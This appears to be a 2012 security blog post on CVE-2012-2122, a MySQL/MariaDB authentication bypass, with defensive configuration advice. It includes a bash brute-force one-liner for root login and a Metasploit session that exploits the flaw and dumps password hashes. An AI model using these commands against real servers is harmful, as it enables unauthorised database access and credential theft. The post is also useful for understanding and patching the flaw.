Monday, June 11, 2012

A critical Security vulnerability in MySQL/MariaDB

Security researchers reveal the existence of a serious security vulnerability in MariaDB and MySQL that enables an attacker to gain root access to the database server.Th vulnerability has been assigned to CVE-2012-2122 id;

According to Sergei Golubchik, security coordinator at MariaDB, the flaw doesn’t affect official vendor binaries, but it does expose the customers of MariaDB and MySQL who use versions such as 5.1.61, 5.2.11, 5.3.5, 5.5.22 and prior.

This flaw was rooted in an assumption that the memcmp() function would always return a value within the range -127 to 127 (signed character). On some platforms and with certain optimizations enabled, this routine can return values outside of this range, eventually causing the code that compares a hashed password to sometimes return true even when the wrong password is specified. Since the authentication protocol generates a different hash each time this comparison is done, there is a 1 in 256 chance that ANY password would be accepted for authentication.

In short, if you try to authenticate to a MySQL server affected by this flaw, there is a chance it will accept your password even if the wrong one was supplied.

The following one-liner in bash will provide access to an affected MySQL server as the root user account, without actually knowing the password.

$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 2>/dev/null; done

Caveats and Defense

The first rule of securing MySQL is to not expose to the network at large in the first place. Most Linux distributions bind the MySQL daemon to localhost, preventing remote access to the service. In cases where network access must be provided, MySQL also provides host-based access controls. There are few use cases where the MySQL daemon should be intentionally exposed to the wider network and without any form of host-based access control.

If you are responsible for a MySQL server that is currently exposed to the network unnecessarily, the easiest thing to do is to modify the my.cnf file in order to restrict access to the local system. Open my.cnf with the editor of your choice, find the section labeled [mysqld] and change (or add a new line to set) the "bind-address" parameter to "". Restart the MySQL service to apply this setting.

Exploit Module for PenTesters:

This evening Jonathan Cran (CTO of Pwnie Express and Metasploit contributor) committed a threaded brute-force module that abuses the authentication bypass flaw to automatically dump the password database. This ensures that even if the authentication bypass vulnerability is fixed, you should still be able to access the database using the cracked password hashes. A quick demonstration of this module is shown below using the latest Metasploit Framework GIT/SVN snapshot.

$ msfconsole

msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump

msf auxiliary(mysql_authbypass_hashdump) > set USERNAME root

msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS

msf auxiliary(mysql_authbypass_hashdump) > run

[+] The server allows logins, proceeding with bypass test

[*] Authentication bypass is 10% complete

[*] Authentication bypass is 20% complete

[*] Successfully bypassed authentication after 205 attempts

[+] Successful exploited the authentication bypass flaw, dumping hashes...

[+] Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D

[+] Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D

[+] Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D

[+] Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D

[+] Saving HashString as Loot: debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89

[*] Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed